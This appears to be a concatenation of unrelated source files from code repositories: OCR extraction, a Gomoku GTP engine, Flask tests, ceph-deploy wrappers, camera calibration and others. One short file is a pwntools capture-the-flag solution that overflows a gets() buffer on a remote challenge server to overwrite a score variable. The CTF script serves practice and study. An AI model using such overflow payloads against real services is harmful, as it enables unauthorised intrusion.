source_file = 'CANADAGOOS-F1Securiti-2152017.PDF'
def consoleout(msg):
    """Print *msg* to stdout prefixed with the current timestamp."""
    timestamp = datetime.now()
    print(f'[{timestamp}] {msg}')
def delete_zuvaocr():
    """Remove a stale output file from a previous run, if one exists."""
    try:
        os.remove(zuva_ocr_file)
    except OSError:
        # File absent (or not removable): nothing to clean up.
        pass
    else:
        print(f'Deleted {zuva_ocr_file}')
def get_source_file_md5():
    """Return a hashlib md5 object digesting the contents of *source_file*.

    Returns the hash object itself (callers use .digest()/.hexdigest()),
    not the digest bytes.  Fixes: the original bound the hash object to a
    local named ``hash`` (shadowing the builtin) and read the whole file
    into memory at once; we now hash in chunks.
    """
    md5_hash = hashlib.md5()
    with open(source_file, 'rb') as source:
        # 64 KiB chunks so large PDFs need not fit in memory.
        for chunk in iter(lambda: source.read(65536), b''):
            md5_hash.update(chunk)
    return md5_hash
# --- Conversion phase: hOCR -> Zuva OCR format -------------------------------
delete_zuvaocr()
converter = HOCRToZuvaOCRConverter()
converter.hocr_folder = hocr_folder
# Embed the source PDF's md5 so the .zuvaocr file is tied to its document.
md5 = get_source_file_md5()
converter.set_document_md5(md5.digest())
consoleout(f'Starting conversion')
converter.start()
converter.export(zuva_ocr_file)
consoleout(f'Conversion done and saved to {zuva_ocr_file}')
# Everything below is dependent on the ZDAI Python Wrapper
field_names_to_extract = ['Title', 'Parties', 'Date', 'Governing Law', 'Indemnity']
sdk = ZDAISDK(from_config = True)
# Resolve the human-readable field names to their ZDAI field ids.
fields, _ = sdk.fields.get()
field_ids = [f.id for f in fields if f.name in field_names_to_extract]
consoleout(f'Obtained field_ids for extraction: {", ".join(field_names_to_extract)}')
# Uncomment the below !
# Upload the converted file, then submit classification, language-detection
# and extraction jobs for it.
with open(zuva_ocr_file, 'rb') as zuvaocr:
    file, _ = sdk.file.create(content = zuvaocr.read(), is_zuva_ocr = True)
consoleout(f'Submitted {zuva_ocr_file} as {file.id}. It expires on {file.expiration}.')
jobs = []
jobs.extend(sdk.classification.create(file_ids = [file.id])[0]) # Uncomment this!
jobs.extend(sdk.language.create(file_ids = [file.id])[0]) # Uncomment this!
jobs.extend(sdk.extraction.create(file_ids = [file.id], field_ids = field_ids)[0])
for job in jobs:
    consoleout(Fore.BLUE + f'{type(job).__name__}' + Fore.RESET + f' Request ID ' +
               Fore.BLUE + job.request_id + Fore.RESET)
consoleout(f'Waiting for requests to complete')
# Wait for the requests to complete
# Polls every 2s; each finished (or failed) job is removed from `jobs` until
# none remain.  NOTE(review): jobs.remove(job) mutates the list while it is
# being iterated, which skips the next element that pass — harmless only
# because the outer while-loop re-scans, but worth fixing.
while len(jobs)>0:
    for job in jobs:
        if isinstance(job, Language):
            _latest, _ = sdk.language.get(request_id = job.request_id)
            if not _latest.is_done(): continue
            if _latest.status == 'failed':
                consoleout(Fore.RED + f'!!! {_latest.request_id} failed !!!' + Fore.RESET)
                consoleout(_latest.json())
                jobs.remove(job)
                continue
            consoleout(Fore.BLUE + f'Language' + Fore.RESET + f' {_latest.language}')
            jobs.remove(job)
        elif isinstance(job, Classification):
            _latest, _ = sdk.classification.get(request_id = job.request_id)
            if not _latest.is_done(): continue
            if _latest.status == 'failed':
                consoleout(Fore.RED + f'!!! {_latest.request_id} failed !!!' + Fore.RESET)
                consoleout(_latest.json())
                jobs.remove(job)
                continue
            is_contract = 'Yes' if _latest.is_contract else 'No'
            consoleout(Fore.BLUE + f'Classification' + Fore.RESET + f' {_latest.classification}')
            consoleout(Fore.BLUE + f'Is it a Contract? ' + Fore.RESET + is_contract)
            jobs.remove(job)
        elif isinstance(job, Extraction):
            _latest, _ = sdk.extraction.get(request_id = job.request_id)
            if not _latest.is_done(): continue
            if _latest.status == 'failed':
                consoleout(Fore.RED + f'!!! {_latest.request_id} failed !!!' + Fore.RESET)
                consoleout(_latest.json())
                jobs.remove(job)
                continue
            extraction, _ = sdk.extraction.get_result(request_id = job.request_id)
            for field in extraction.fields:
                if len(field.extractions)>0:
                    field_name = [f.name for f in fields if f.id == field.field_id][0]
                    for field_extraction in field.extractions:
                        # This contains an ExtractionResult: the text & the spans.
                        # We need to use the spans to figure out the bounding boxes from
                        # the list of Zuva Characters (which come from the converter)
                        # Note that the spans property is an array of starts and ends,
                        # So we need to iterate through those to grab their indices.
                        print(f'{field_name}: {field_extraction.text}')
                        for span in field_extraction.spans:
                            # NOTE(review): zuva_characters is computed but never
                            # used; the per-character loop below re-reads the
                            # document's character list directly instead.
                            zuva_characters = converter.get_zuvaocr_characters_by_range(start = span.get('start'),
                                                                                       end = span.get('end'))
                            # Go through the range of this span to grab the Zuva Characters
                            for i in range(span.get('start'), span.get('end')):
                                zuva_character = converter.zuva_document.characters[i]
                                zuva_page = converter.get_zuvaocr_page_by_character_position(i) + 1 # 0-based indices
                                print(f' [Field \"{field_name}\"] '
                                      f'[Page: {zuva_page}] '
                                      f'[Character: \"{chr(zuva_character.unicode)}\"] '
                                      f'[BoundingBox: '
                                      f'x1={zuva_character.bounding_box.x1}, '
                                      f'y1={zuva_character.bounding_box.y1}, '
                                      f'x2={zuva_character.bounding_box.x2}, '
                                      f'y2={zuva_character.bounding_box.y2}] '
                                      )
            jobs.remove(job)
    time.sleep(2)
"francois.longtin@kirasystems.com"
] | francois.longtin@kirasystems.com |
8143df4cf84b31a4228183b1bc7cc7da429e74d9 | f01c1f5a6f3a9377bc83be0e8cfe29ac59272378 | /cmput496/assignment3/gtp_connection.py | 28453102f55576df1d63875016492d0412efaefa | [] | no_license | boweiww/Projects | 528d01205565ebb7f0c84f28d840eecf4e329274 | 5e0375a17fc97f623557ca6a2b1d20ebd360664f | refs/heads/master | 2021-10-24T09:50:20.539585 | 2019-03-24T22:34:26 | 2019-03-24T22:34:26 | 113,407,661 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,139 | py | """
gtp_connection.py
Module for playing games of Go using GoTextProtocol
Parts of this code were originally based on the gtp module
in the Deep-Go project by Isaac Henrion and Amos Storkey
at the University of Edinburgh.
"""
import traceback
from sys import stdin, stdout, stderr
from board_util import GoBoardUtil, BLACK, WHITE, EMPTY, BORDER, PASS, \
MAXSIZE, coord_to_point
import numpy as np
import re
class GtpConnection():
    def __init__(self, go_engine, board, debug_mode = False):
        """
        Manage a GTP connection for a Go-playing engine

        Parameters
        ----------
        go_engine:
            a program that can reply to a set of GTP commands below
        board:
            Represents the current board state.
        debug_mode:
            when True, diagnostic messages are echoed to stderr.
        """
        self._debug_mode = debug_mode
        self.go_engine = go_engine
        self.board = board
        # Dispatch table: GTP command name -> bound handler method.
        self.commands = {
            "protocol_version": self.protocol_version_cmd,
            "quit": self.quit_cmd,
            "name": self.name_cmd,
            "boardsize": self.boardsize_cmd,
            "showboard": self.showboard_cmd,
            "clear_board": self.clear_board_cmd,
            "komi": self.komi_cmd,
            "version": self.version_cmd,
            "known_command": self.known_command_cmd,
            "genmove": self.genmove_cmd,
            "list_commands": self.list_commands_cmd,
            "play": self.play_cmd,
            "legal_moves": self.legal_moves_cmd,
            "gogui-rules_game_id": self.gogui_rules_game_id_cmd,
            "gogui-rules_board_size": self.gogui_rules_board_size_cmd,
            "gogui-rules_legal_moves": self.gogui_rules_legal_moves_cmd,
            "gogui-rules_side_to_move": self.gogui_rules_side_to_move_cmd,
            "gogui-rules_board": self.gogui_rules_board_cmd,
            "gogui-rules_final_result": self.gogui_rules_final_result_cmd,
            "gogui-analyze_commands": self.gogui_analyze_cmd,
            "policy": self.policy_cmd,
            "policy_moves": self.policy_moves_cmd,
        }
        # used for argument checking
        # values: (required number of arguments,
        #          error message on argnum failure)
        self.argmap = {
            "boardsize": (1, 'Usage: boardsize INT'),
            "komi": (1, 'Usage: komi FLOAT'),
            "known_command": (1, 'Usage: known_command CMD_NAME'),
            "genmove": (1, 'Usage: genmove {w,b}'),
            "play": (2, 'Usage: play {b,w} MOVE'),
            "legal_moves": (1, 'Usage: legal_moves {w,b}'),
            "policy": (1, "Usage: policy policytype")
        }
def write(self, data):
stdout.write(data)
def flush(self):
stdout.flush()
    def start_connection(self):
        """
        Start a GTP connection.
        This function continuously monitors standard input for commands.
        Terminates when stdin is closed (readline returns '').
        """
        line = stdin.readline()
        while line:
            self.get_cmd(line)
            line = stdin.readline()
    def get_cmd(self, command):
        """
        Parse one GTP command line and dispatch it to its handler.
        Blank lines and '#' comment lines are ignored; an optional leading
        sequence number (used by regression tests) is stripped first.
        """
        if len(command.strip(' \r\t')) == 0:
            return
        if command[0] == '#':
            return
        # Strip leading numbers from regression tests
        if command[0].isdigit():
            command = re.sub("^\d+", "", command).lstrip()
        elements = command.split()
        if not elements:
            return
        command_name = elements[0]; args = elements[1:]
        # Wrong argument count: has_arg_error already sent the usage error.
        if self.has_arg_error(command_name, len(args)):
            return
        if command_name in self.commands:
            try:
                self.commands[command_name](args)
            except Exception as e:
                # Log the failure for debugging, then re-raise so the caller
                # (or test harness) sees the original exception.
                self.debug_msg("Error executing command {}\n".format(str(e)))
                self.debug_msg("Stack Trace:\n{}\n".
                               format(traceback.format_exc()))
                raise e
        else:
            self.debug_msg("Unknown command: {}\n".format(command_name))
            self.error('Unknown command')
        stdout.flush()
def has_arg_error(self, cmd, argnum):
"""
Verify the number of arguments of cmd.
argnum is the number of parsed arguments
"""
if cmd in self.argmap and self.argmap[cmd][0] != argnum:
self.error(self.argmap[cmd][1])
return True
return False
def debug_msg(self, msg):
""" Write msg to the debug stream """
if self._debug_mode:
stderr.write(msg)
stderr.flush()
def error(self, error_msg):
""" Send error msg to stdout """
stdout.write('? {}\n\n'.format(error_msg))
stdout.flush()
def respond(self, response=''):
""" Send response to stdout """
stdout.write('= {}\n\n'.format(response))
stdout.flush()
def reset(self, size):
"""
Reset the board to empty board of given size
"""
self.board.reset(size)
def board2d(self):
return str(GoBoardUtil.get_twoD_board(self.board))
def protocol_version_cmd(self, args):
""" Return the GTP protocol version being used (always 2) """
self.respond('2')
"""The code is added at here"""
def policy_cmd(self,args):
if args[0] != 'random' and args[0] != 'rule_based':
self.respond("illegal policy: {}".format(args[0]))
else:
self.policy = args[0]
self.respond()
    def policy_moves_cmd(self,args):
        # Respond with the move type and the sorted list of moves the
        # currently selected policy ('random' or 'rule_based') would play.
        # An empty response is sent when the policy returns PASS.
        if self.policy == 'random':
            MoveType,position = self.go_engine.random(self.board)
        else:
            MoveType,position = self.go_engine.RuleBased(self.board)
        if position == PASS:
            self.respond()
            return
        # Convert each board point into its GTP coordinate string.
        moves = []
        for i in range(len(position)):
            move_coord = point_to_coord(position[i], self.board.size)
            move_as_string = format_point(move_coord)
            moves.append(move_as_string)
        moves.sort()
        movestr = " ".join(str(move) for move in moves)
        self.respond("{} {}".format(MoveType,movestr))
        # else:
        #     self.respond("illegal move: {}".format(move_as_string))
"""code end"""
    def quit_cmd(self, args):
        """ Quit game and exit the GTP interface """
        # Acknowledge the command first, then terminate the whole process.
        self.respond()
        exit()
def name_cmd(self, args):
""" Return the name of the Go engine """
self.respond(self.go_engine.name)
def version_cmd(self, args):
""" Return the version of the Go engine """
self.respond(self.go_engine.version)
def clear_board_cmd(self, args):
""" clear the board """
self.reset(self.board.size)
self.respond()
def boardsize_cmd(self, args):
"""
Reset the game with new boardsize args[0]
"""
self.reset(int(args[0]))
self.respond()
def showboard_cmd(self, args):
self.respond('\n' + self.board2d())
def komi_cmd(self, args):
"""
Set the engine's komi to args[0]
"""
self.go_engine.komi = float(args[0])
self.respond()
def known_command_cmd(self, args):
"""
Check if command args[0] is known to the GTP interface
"""
if args[0] in self.commands:
self.respond("true")
else:
self.respond("false")
def list_commands_cmd(self, args):
""" list all supported GTP commands """
self.respond(' '.join(list(self.commands.keys())))
    def legal_moves_cmd(self, args):
        """
        List legal moves for color args[0] in {'b','w'}
        """
        # NOTE(review): this method is re-defined, byte-identically, later in
        # the class; this first definition is dead code (the later one wins).
        board_color = args[0].lower()
        color = color_to_int(board_color)
        moves = GoBoardUtil.generate_legal_moves(self.board, color)
        gtp_moves = []
        for move in moves:
            coords = point_to_coord(move, self.board.size)
            gtp_moves.append(format_point(coords))
        sorted_moves = ' '.join(sorted(gtp_moves))
        self.respond(sorted_moves)
    def play_cmd(self, args):
        """
        play a move args[1] for given color args[0] in {'b','w'}
        """
        try:
            board_color = args[0].lower()
            board_move = args[1]
            if board_color != "b" and board_color !="w":
                self.respond("illegal move: \"{}\" wrong color".format(board_color))
                return
            color = color_to_int(board_color)
            # 'pass' skips the turn and flips the side to move.
            if args[1].lower() == 'pass':
                self.board.play_move(PASS, color)
                self.board.current_player = GoBoardUtil.opponent(color)
                self.respond()
                return
            # Translate the GTP coordinate string to a board point.
            coord = move_to_coord(args[1], self.board.size)
            if coord:
                move = coord_to_point(coord[0],coord[1], self.board.size)
            else:
                # NOTE(review): `move` is referenced here before assignment;
                # this branch would raise NameError if ever reached.  In
                # practice move_to_coord raises ValueError instead of
                # returning a falsy value, so the branch is near-unreachable.
                self.error("Error executing move {} converted from {}"
                           .format(move, args[1]))
                return
            if not self.board.play_move_gomoku(move, color):
                self.respond("illegal move: \"{}\" occupied".format(board_move))
                return
            else:
                self.debug_msg("Move: {}\nBoard:\n{}\n".
                               format(board_move, self.board2d()))
                self.respond()
        except Exception as e:
            # Report the failure to the client as a GTP response.
            self.respond('{}'.format(str(e)))
    def genmove_cmd(self, args):
        """
        Generate a move for the color args[0] in {'b', 'w'}, for the game of gomoku.
        Responds "pass" on a finished (won/drawn) game in our favor, "resign"
        when the opponent has already won, otherwise plays and returns the
        move chosen by the rule-based policy.
        """
        board_color = args[0].lower()
        color = color_to_int(board_color)
        game_end, winner = self.board.check_game_end_gomoku()
        if game_end:
            if winner == color or winner == EMPTY:
                self.respond("pass")
            else:
                self.respond("resign")
            return
        # RuleBased returns (move type, list of candidate points); play the
        # first candidate.
        _,position = self.go_engine.RuleBased(self.board)
        if position == PASS:
            self.respond("pass")
            return
        move = position[0]
        move_coord = point_to_coord(move, self.board.size)
        move_as_string = format_point(move_coord)
        if self.board.is_legal_gomoku(move, color):
            self.board.play_move_gomoku(move, color)
            self.respond(move_as_string)
        else:
            self.respond("illegal move: {}".format(move_as_string))
def gogui_rules_game_id_cmd(self, args):
self.respond("Gomoku")
def gogui_rules_board_size_cmd(self, args):
self.respond(str(self.board.size))
    def legal_moves_cmd(self, args):
        """
        List legal moves for color args[0] in {'b','w'}
        """
        # NOTE(review): byte-identical duplicate of the earlier
        # legal_moves_cmd definition; this later one is the effective method.
        board_color = args[0].lower()
        color = color_to_int(board_color)
        moves = GoBoardUtil.generate_legal_moves(self.board, color)
        gtp_moves = []
        for move in moves:
            coords = point_to_coord(move, self.board.size)
            gtp_moves.append(format_point(coords))
        sorted_moves = ' '.join(sorted(gtp_moves))
        self.respond(sorted_moves)
    def gogui_rules_legal_moves_cmd(self, args):
        # GoGui rules extension: list all legal gomoku moves for the side to
        # move, sorted as GTP coordinate strings.  An empty response is sent
        # once the game has ended (no legal moves remain relevant).
        game_end,_ = self.board.check_game_end_gomoku()
        if game_end:
            self.respond()
            return
        moves = GoBoardUtil.generate_legal_moves_gomoku(self.board)
        gtp_moves = []
        for move in moves:
            coords = point_to_coord(move, self.board.size)
            gtp_moves.append(format_point(coords))
        sorted_moves = ' '.join(sorted(gtp_moves))
        self.respond(sorted_moves)
def gogui_rules_side_to_move_cmd(self, args):
color = "black" if self.board.current_player == BLACK else "white"
self.respond(color)
def gogui_rules_board_cmd(self, args):
size = self.board.size
str = ''
for row in range(size-1, -1, -1):
start = self.board.row_start(row + 1)
for i in range(size):
point = self.board.board[start + i]
if point == BLACK:
str += 'X'
elif point == WHITE:
str += 'O'
elif point == EMPTY:
str += '.'
else:
assert False
str += '\n'
self.respond(str)
    def gogui_rules_final_result_cmd(self, args):
        # GoGui rules extension: report the game outcome — "black"/"white"
        # for a win, "draw" when the board is full with no winner, and
        # "unknown" while the game is still in progress.
        game_end, winner = self.board.check_game_end_gomoku()
        moves = self.board.get_empty_points()
        board_full = (len(moves) == 0)
        if board_full and not game_end:
            self.respond("draw")
            return
        if game_end:
            color = "black" if winner == BLACK else "white"
            self.respond(color)
        else:
            self.respond("unknown")
def gogui_analyze_cmd(self, args):
self.respond("pstring/Legal Moves For ToPlay/gogui-rules_legal_moves\n"
"pstring/Side to Play/gogui-rules_side_to_move\n"
"pstring/Final Result/gogui-rules_final_result\n"
"pstring/Board Size/gogui-rules_board_size\n"
"pstring/Rules GameID/gogui-rules_game_id\n"
"pstring/Show Board/gogui-rules_board\n"
)
def point_to_coord(point, boardsize):
    """
    Convert a board-array index into a (row, col) coordinate pair.
    Special case: PASS is returned unchanged.
    """
    if point == PASS:
        return PASS
    # Board rows are stored with one extra border column.
    row_length = boardsize + 1
    return divmod(point, row_length)
def format_point(move):
    """
    Return a (row, col) move as a GTP coordinate string such as 'A1',
    or 'pass' for the pass move.  The column letter 'I' is skipped by
    GTP convention.  Raises ValueError for out-of-range coordinates.
    """
    if move == PASS:
        return "pass"
    column_letters = "ABCDEFGHJKLMNOPQRSTUVWXYZ"
    row, col = move
    if not (0 <= row < MAXSIZE and 0 <= col < MAXSIZE):
        raise ValueError
    return "{}{}".format(column_letters[col - 1], row)
def move_to_coord(point_str, board_size):
    """
    Convert a string point_str representing a point, as specified by GTP,
    to a pair of coordinates (row, col) in range 1 .. board_size.
    "pass" (case-insensitive) is returned as PASS.
    Raises ValueError if point_str is invalid
    """
    if not 2 <= board_size <= MAXSIZE:
        raise ValueError("board_size out of range")
    s = point_str.lower()
    if s == "pass":
        return PASS
    try:
        col_c = s[0]
        # 'i' is not a valid GTP column letter (skipped by convention).
        if (not "a" <= col_c <= "z") or col_c == "i":
            raise ValueError
        col = ord(col_c) - ord("a")
        # Columns after 'i' are shifted down by one because 'i' is skipped.
        if col_c < "i":
            col += 1
        row = int(s[1:])
        if row < 1:
            raise ValueError
    except (IndexError, ValueError):
        raise ValueError("illegal move: \"{}\" wrong coordinate".format(s))
    if not (col <= board_size and row <= board_size):
        raise ValueError("illegal move: \"{}\" wrong coordinate".format(s))
    return row, col
def color_to_int(c):
    """Convert a color code ('b', 'w', 'e', or 'BORDER') to its integer
    board constant.  Raises KeyError for unknown codes.

    Fix: the lookup table was previously a local also named color_to_int,
    shadowing this function's own name; renamed to color_codes.
    """
    color_codes = {"b": BLACK , "w": WHITE, "e": EMPTY,
                   "BORDER": BORDER}
    return color_codes[c]
| [
"boweiww@gmail.com"
] | boweiww@gmail.com |
876a38600caafb0020074dfb9d8bcc1fcd87330a | e2c2920d197e51201b0aa4127afe4a701d2f8722 | /lcy8047/HackCTF/Poet/ex.py | d33a857d62d8841678fffb993c13969b3491edde | [] | no_license | JinukHong/CTF | d564c7db194e165b37c1bc9f51fc1ffba9af1bb5 | a8765bd3b8028aeaccc0435d13ee1c2be94f8e41 | refs/heads/master | 2023-07-19T15:40:48.569456 | 2021-09-17T14:51:55 | 2021-09-17T14:51:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 577 | py | from pwn import *
'''
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
'''
r = remote("ctf.j0n9hyun.xyz", 3012)
# poet, author and score are all global variables (BSS).
# Both poet and author are read with gets(), so there is a buffer overflow.
# author is a 64-byte buffer and score sits immediately after it in memory,
# so we overflow author to overwrite score with 1000000 (the win condition).
print(r.recv().decode('utf-8'))
r.sendline()
print(r.recv().decode('utf-8'))
# 64 filler bytes to reach score, then the little-endian target value.
r.sendline(b"A"*64+p32(1000000))
r.interactive()
"lcy8047@gmail.com"
] | lcy8047@gmail.com |
5890843886f71a5b8037a0e84989012f7b2a4c32 | 61527c79c6f6752ae926bb82b38d23106a77ba91 | /src/data/py.py | 6fb9ee7b9b37f41a8d835b3d0c962e94e24845b6 | [] | no_license | MetaNovitia/DataPortal | 0bd884e4ecdbf7e6bc216eff237217621389a8a6 | 56bbf5cbe0f8e7c4149a6ff40962d2d4b3cfc87f | refs/heads/master | 2023-01-24T16:07:12.012234 | 2020-02-12T22:08:07 | 2020-02-12T22:08:07 | 197,293,378 | 1 | 1 | null | 2023-01-04T04:38:28 | 2019-07-17T01:37:53 | JavaScript | UTF-8 | Python | false | false | 537 | py | import json
f=open("ns.json",'w')
d = {"Basin":[{},{}],"Region":[{},{}],"All":[{},{}]}
for i in range (1,406):
if i not in d["Basin"][0]: d["Basin"][0][i] = []
d["Basin"][0][i].append(str(i))
d["Basin"][1][i] = str(i)
if i//40 not in d["Region"][0]: d["Region"][0][i//40] = []
d["Region"][0][i//40].append(str(i))
d["Region"][1][i] = str(i//40)
if 0 not in d["All"][0]: d["All"][0][0] = []
d["All"][0][0].append(str(i))
d["All"][1][i] = "0"
f.write(json.dumps(d))
f.close() | [
"mnovitia@uci.edu"
] | mnovitia@uci.edu |
4d252038bcbc9eef1bf76cf1aad3a729a21082bc | 9d030f2fa76a53014dcf437cc436ecad6c95de0b | /Score_evaluator/migrations/0004_remove_category_likes.py | c28555126cc510d27a6370538b2a4c4830f7f3ad | [] | no_license | rotonmeta/SocialSearchEngine | 40776b296c3c76666ca472f9014f7f57a05a7dad | 661ac9be5fa1694b5a94bf9d514a3d6c11af4f2d | refs/heads/master | 2020-05-18T19:26:45.349597 | 2019-07-08T15:07:26 | 2019-07-08T15:07:26 | 173,291,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 345 | py | # Generated by Django 2.2.1 on 2019-06-18 15:47
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Score_evaluator', '0003_remove_categoryscore_score'),
]
operations = [
migrations.RemoveField(
model_name='category',
name='likes',
),
]
| [
"roton-meta@live.com"
] | roton-meta@live.com |
090da0f152d71f00b414a43dc812e92cbe6ee8da | 4477b53f4cc0a5ac444a424a4b975406eccc50c0 | /APproject/tests/test_reservation.py | a83d39b09d600365b3037b342e0acafbd6af5ed2 | [] | no_license | V-Saikus/APlabs | 26330fd32ff34e6f39da7e560d17c8e59ddfbd54 | af08b0869c5324b958f8ad5cb829a3c458c0c0b6 | refs/heads/main | 2023-02-04T07:22:51.499155 | 2020-12-28T10:19:15 | 2020-12-28T10:19:15 | 309,087,299 | 0 | 0 | null | 2020-12-28T10:19:16 | 2020-11-01T12:07:34 | Python | UTF-8 | Python | false | false | 4,316 | py | from tests.test_audience import *
import base64
class MyThirdTest(TestCase):
def create_app(self):
# app = Flask(__name__)
app.config['TESTING'] = True
return app
def setUp(self):
db.session.commit()
db.create_all()
def tearDown(self):
db.session.commit()
db.drop_all()
def test_server_is_up_and_running(self):
http = urllib3.PoolManager()
url = 'http://localhost:5000/'
response = http.request('GET', url)
self.assertEqual(response.status, 200)
def test_post_reservation(self):
audience_test = MySecondTest()
audience_test.test_post_audience()
with app.test_client() as client:
error_response = client.post(
'/audience/reserve',
headers={'Content-Type': 'something',
'Authorization': 'Basic ' + base64.b64encode('example18@mail.com:qwerty'.encode()).decode()}
)
self.assertEqual(error_response.status_code, 400)
data = {'start_time': '2020-8-14 03:30:35.166',
'end_time': '2020-8-14 06:30:35.166',
'user_id': 1,
'audience_id': 1,
}
encoded_data = json.dumps(data).encode('utf-8')
response = client.post(
'/audience/reserve',
data=encoded_data,
headers={'Content-Type': 'application/json',
'Authorization': 'Basic ' + base64.b64encode('example18@mail.com:qwerty'.encode()).decode()}
)
self.assertEqual(response.status_code, 201)
def test_get_reservation_by_id(self):
with app.test_client() as client:
self.assertEqual(client.get('/audience/reserve/smth', ).status_code, 400)
self.test_post_reservation()
with app.test_client() as client:
response = client.get(
'/audience/reserve/1',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(client.get('/audience/reserve/2', ).status_code, 404)
def test_update_reservation(self):
self.test_post_reservation()
with app.test_client() as client:
data = {'start_time': '2020-8-14 06:30:35.166',
'end_time': '2020-8-14 09:30:35.166',
}
encoded_data = json.dumps(data).encode('utf-8')
response = client.put(
'/reserve/1',
data=encoded_data,
headers={'Content-Type': 'application/json',
'Authorization': 'Basic ' + base64.b64encode('example18@mail.com:qwerty'.encode()).decode()}
)
invalid_reservation_response = client.put(
'/reserve/smth',
headers={'Content-Type': 'application/json',
'Authorization': 'Basic ' + base64.b64encode('example18@mail.com:qwerty'.encode()).decode()}
)
data1 = {}
encoded_data1 = json.dumps(data1).encode('utf-8')
invalid_body_response = client.put(
'/reserve/1',
data=encoded_data1,
headers={'Content-Type': 'application/json',
'Authorization': 'Basic ' + base64.b64encode('example18@mail.com:qwerty'.encode()).decode()}
)
self.assertEqual(response.status_code, 202)
self.assertEqual(invalid_reservation_response.status_code, 404)
self.assertEqual(invalid_body_response.status_code, 404)
def test_delete_reservation_by_id(self):
self.test_post_reservation()
with app.test_client() as client:
response = client.delete(
'/reserve/1',
headers={'Authorization': 'Basic ' + base64.b64encode('example18@mail.com:qwerty'.encode()).decode()}
)
invalid_reservation_response = client.delete(
'/reserve/smth',
headers={'Authorization': 'Basic ' + base64.b64encode('example18@mail.com:qwerty'.encode()).decode()}
)
self.assertEqual(response.status_code, 200)
self.assertEqual(invalid_reservation_response.status_code, 404)
| [
"kiltik12@gmail.com"
] | kiltik12@gmail.com |
fa870428c18812b9d152127aa4df6cc4092bdbff | e967290f67437c0afcbb4597e9ba6020761f2a45 | /github.com/ceph/ceph-deploy/ceph_deploy/util/wrappers.py | 4bff77b5657b6ea0ac484359fb93d3a804362451 | [
"MIT"
] | permissive | mp-rheinrich/mp-fs-sandbox | 77bf40a27a0d6c2b38cbc7562023a92fca8751c0 | 35c38ac9d4d7ad941facfd24ab0a068630c57bdf | refs/heads/master | 2020-05-31T11:13:13.474102 | 2013-08-21T12:59:11 | 2013-08-21T12:59:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,052 | py | """
In a lot of places we need to make system calls, mainly through subprocess.
Here we define them and reuse them with the added functionality of getting
logging and remote execution.
This allows us to only remote-execute the actual calls, not whole functions.
"""
from ceph_deploy.util.decorators import remote_compile
from ceph_deploy.util import context
def check_call(conn, logger, args, *a, **kw):
"""
Wraps ``subprocess.check_call`` for a remote call via ``pushy``
doing all the capturing and logging nicely upon failure/success
The mangling of the traceback when an exception ocurrs, is because the
caller gets eating up by not being executed in the actual function of
a given module (e.g. ``centos/install.py``) but rather here, where the
stack trace is no longer relevant.
:param args: The args to be passed onto ``check_call``
"""
command = ' '.join(args)
patch = kw.pop('patch', True) # Always patch unless explicitly told to
logger.info('Running command: %s' % command)
def remote_call(args, *a, **kw):
import subprocess
subprocess.check_call(
args,
*a,
**kw
)
with context.remote(conn, logger, remote_call, mangle_exc=False, patch=patch) as call:
try:
return call(args, *a, **kw)
except Exception as err:
import inspect
stack = inspect.getframeinfo(inspect.currentframe().f_back)
if hasattr(err, 'remote_traceback'):
logger.error('Traceback (most recent call last):')
logger.error(' File "%s", line %s, in %s' % (
stack[0],
stack[1],
stack[2])
)
err.remote_traceback.pop(0)
for line in err.remote_traceback:
if line:
logger.error(line)
raise RuntimeError('Failed to execute command: %s' % ' '.join(args))
else:
raise err
| [
"roman.heinrich@gmail.com"
] | roman.heinrich@gmail.com |
0a418fc8812aada8d4b208cdc5ff09a38eebd7ae | 125d2d87b993280dfcec0d755655cf0d2e8a7194 | /Computer_Files/Test/calibrate_camera.py | d32bc64d1f576fe58a61d4356bfc65f3a5731af1 | [] | no_license | QuentinCar/DemoHydro | ab1383728050d1b2b0b0c14ad6db773933076a46 | 3ab12db8befab68e5931a284aa66352ebddd45cc | refs/heads/master | 2020-06-21T04:18:26.614428 | 2019-09-17T12:46:24 | 2019-09-17T12:46:24 | 197,342,043 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,480 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jun 12 14:15:55 2019
@author: Quentin
"""
import numpy as np
import cv2
import glob
def calibration():
print("Define Calibration Parameter...")
# termination criteria
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)
# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)
objp = np.zeros((6*7,3), np.float32)
objp[:,:2] = np.mgrid[0:7,0:6].T.reshape(-1,2)
# Arrays to store object points and image points from all the images.
objpoints = [] # 3d point in real world space
imgpoints = [] # 2d points in image plane.
images = glob.glob('calib_images/*.jpg')
i = 0
for fname in images:
print(len(images)-i, " images remaining")
i+=1
img = cv2.imread(fname)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
# Find the chess board corners
ret, corners = cv2.findChessboardCorners(gray, (7,6),None)
# If found, add object points, image points (after refining them)
if ret == True:
objpoints.append(objp)
corners2 = cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria)
imgpoints.append(corners2)
# Draw and display the corners
# img = cv2.drawChessboardCorners(img, (7,6), corners2,ret)
# cv2.imshow('img',cv2.resize(img,(int(img.shape[1]*0.4),int(img.shape[0]*0.4))))
# cv2.waitKey(5)
# cv2.destroyAllWindows()
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1],None,None)
print("Get Optimal Parameter...")
h, w = img.shape[:2]
newcameramtx, roi=cv2.getOptimalNewCameraMatrix(mtx,dist,(w,h),1,(w,h))
return newcameramtx, roi, mtx, dist
def undistort(img, newcameramtx, roi, mtx, dist):
# print("Undistort image...")
# undistort
dst = cv2.undistort(img, mtx, dist, None, newcameramtx)
# print("Crop Image according to ROI...")
# crop the image
x,y,w,h = roi
dst = dst[y:y+h, x:x+w]
# cv2.imshow('calibresult',cv2.resize(dst,(int(dst.shape[1]*0.4),int(dst.shape[0]*0.4))))
return dst
if __name__ == "__main__":
img = cv2.imread("left0.jpg")
newcameramtx, roi, mtx, dist = calibration()
